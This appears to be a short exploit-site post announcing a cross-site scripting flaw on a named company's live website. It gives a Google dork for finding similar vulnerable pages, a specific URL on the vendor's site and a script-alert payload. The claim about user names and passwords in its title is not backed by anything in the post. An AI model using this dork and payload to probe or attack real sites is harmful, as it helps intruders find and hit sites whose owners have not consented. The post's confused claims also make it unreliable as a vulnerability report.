facebook facebook twitter rss

user and password of the American Recovery site XSS Vulnerability

Author: Rednofozi , Published: 01-09-2018
############################################
# Title : user and password of the American Recovery site XSS Vulnerability
# Author :Rednofozi
# category : webapps
# Tested On : Win 8 , Kali Linux
# my team:https://anonysec.org
# me : Rednofozi@yahoo.com
# Vendor HomePage :https://www.diamondcard.us
# Google Dork: inurl:''/.php?pass=' site:us
############################################

# search google Dork :inurl:''/.php?pass=' site:us
####################Proof of Concept #############



#Demo and test :
https://www.diamondcard.us/download/api/example.php' (xxsVulnerability)

<script>alert("rednofozi")</script>

# Discovered by : Rednofozi


#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow

Like us on Facebook :